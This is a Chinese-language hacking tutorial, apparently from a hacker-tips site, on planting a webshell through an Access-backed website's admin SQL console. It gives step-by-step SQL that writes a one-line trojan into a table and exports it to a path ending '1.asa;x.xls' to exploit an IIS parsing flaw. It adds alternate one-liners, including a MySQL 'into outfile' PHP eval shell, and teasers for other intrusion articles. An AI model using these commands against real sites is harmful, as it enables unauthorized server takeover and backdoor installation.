实用环境,在Access后台其他 *** 不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。
逐一执行以下语句就可以导出一句话了
之一句代码
create table cmd (a varchar(50))
第二句代码
insert into cmd (a) values ('一句话木马')
第三句代码
select * into [a] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 4.0;' from cmd
第四句代码
drop table cmd
然后直接菜刀里连接http://www.xxoo.com/1.asa;x.xls
SQL语句意思解释:
之一句
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句
在表cmd的a字段插入一句话木马
第三句
把cmd表a的内容导出到路径e:\web\mumaasp\的EXCEL文件
第四句
删除建立的cmd表
以下内容为测试:
Access利用后台SQL执行命令功能导出WebShell:
这个更简单:
Select 'asp一句话木马' into [vote] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 8.0;' from vote或者
Select 'php一句话木马' into outfile 'F:/wwwroot/mumaasp.com/eval.php';
后台有执行SQL语句功能(vote为已知表段)
什么叫OllyDbg? 这一黑客工具是一个32位系统汇编器剖析程序调试。二进制代码剖析促使该专用工具在源不能用的状况下很有效。OllyDbg具备优良的操作界面,循环系统,API启用,高級编码剖析,可...
什么叫cURL Cyber? Curl是一个命令行工具,作为应用URL英语的语法传送数据的库。该专用工具适用多种多样协议书,包含但不限于:FILE,DICT,FTP,FTPS,HTTP,HTTPS,...
很多人想学网络黑客专业知识,却不知道怎样新手入门,在网上的实例教程也太繁杂,新手看过也头痛,那還是我要写网络黑客系列产品基础教程吧,跟着做,你可以黑客入门的。它是第四篇,大家借由扫描仪之首NMAP的...
关键字:美工及程序设计:金站网·通易建站 漏洞上传:/UpFileForm.asp(在域名后加上) 讲解下burp截断吧 先代理本地ip burp截断...
作者:qingran 首先百度搜索关键字:inurl: (mmdatabase.asp) 我随便列举一个: www.xxxx.com 修改链接:http://w...
作为网络爱好者,我们中的很多人都有一个黑客梦,就如同多数男孩都有一个武侠梦。黑客们凭借着高超的电脑技术、来无影去无踪的身手,宛如一个个武艺高超,轻功卓越的大侠在我们眼前飘过,令人心驰神往,却又可遇而不...